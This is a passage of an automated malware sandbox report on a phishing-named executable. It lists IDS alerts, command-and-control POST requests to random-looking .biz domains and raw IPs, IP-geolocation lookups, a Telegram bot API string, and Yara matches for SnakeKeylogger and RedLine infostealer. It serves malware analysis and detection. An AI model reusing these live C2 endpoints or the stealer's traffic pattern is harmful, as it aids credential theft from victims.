                  Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:53251 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:54852 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49780 -> 172.234.222.138:80
                  Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49903 -> 82.112.184.197:80
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49718 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49740
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49754 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49740
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.7:49922
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.7:49922
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /hndiufmakse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: global trafficHTTP traffic detected: POST /hcvpcb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /lxda HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: global trafficHTTP traffic detected: POST /lkgggwxh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /lsfncqfq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: global trafficHTTP traffic detected: POST /algtvyj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /oxlmrobhj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: global trafficHTTP traffic detected: POST /kpnskvgb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /fmyrcucxukod HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: global trafficHTTP traffic detected: POST /rdl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /prgqqrrnmmetm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: global trafficHTTP traffic detected: POST /oitulo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /agmjd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49725 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49759 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: time.windows.com
                  Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                  Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                  Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                  Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                  Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                  Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                  Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                  Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                  Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                  Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                  Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                  Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                  Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                  Source: unknownHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: alg.exe, 0000000B.00000003.1672024294.000000000051E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1750326950.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/lkgggwxh
                  Source: alg.exe, 0000000B.00000003.1750547017.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1672024294.0000000000531000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/lkgggwxh
                  Source: alg.exe, 0000000B.00000003.1524192545.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/j
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/jqj
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/7
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/H
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/S
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2747734535.0000000009D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/agmjd
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/agmjdrrnmmetm0
                  Source: alg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/algtvyjJ
                  Source: vbc.exe, 00000009.00000002.2639227237.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/fmyrcucxukod
                  Source: vbc.exe, 00000009.00000002.2639227237.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/lsfncqfq
                  Source: vbc.exe, 00000009.00000002.2639227237.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/oxlmrobhj
                  Source: alg.exe, 0000000B.00000003.1970878645.0000000000531000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/algtvyj
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/fmyrcucxukod
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/lsfncqfq
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/oxlmrobhj
                  Source: vbc.exe, 00000009.00000002.2696625029.0000000007861000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndn
                  Source: vbc.exe, 00000009.00000002.2696625029.00000000077FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.
                  Source: vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.P
                  Source: vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: vbc.exe, 00000009.00000002.2696625029.0000000007861000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007831000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/h
                  Source: vbc.exe, 00000009.00000002.2696625029.00000000077F6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/p
                  Source: vbc.exe, 00000009.00000002.2696625029.0000000007892000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: RFQ_PO N89397-GM7287-Order.bat.exe, 00000000.00000002.1420209472.0000000003493000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.000000000777C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.2696625029.0000000007849000.00000004.00000800.00020000.00000000.sdmp, YRtQgzFlDnVSru.exe, 00000016.00000002.1552755563.0000000002689000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: alg.exe, 0000000B.00000003.2062072594.0000000000B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: SingleClientServicesUpdater.exe.9.drString found in binary or memory: http://www.winimage.com/zLibDll
                  Source: vbc.exe, 00000009.00000002.2747734535.0000000009C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xlfhhhm.biz/
                  Source: vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: vbc.exe, 0000002A.00000002.2671075234.0000000007779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228
                  Source: vbc.exe, 00000009.00000002.2696625029.0000000007876000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000002A.00000002.2671075234.0000000007846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228l
                  Source: vbc.exe, 00000009.00000002.2696625029.00000000077A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org8
                  Source: vbc.exe, 0000002A.00000002.2671075234.0000000007779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.orgLL(
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.6272458.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.YRtQgzFlDnVSru.exe.36cce48.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 22.2.YRtQgzFlDnVSru.exe.3819e68.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.YRtQgzFlDnVSru.exe.3819e68.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.63bf478.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.6272458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 22.2.YRtQgzFlDnVSru.exe.36cce48.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\f1a1dcf99c90d829.bin
                  Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_05701A030_2_05701A03
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeCode function: 0_2_057021DB0_2_057021DB
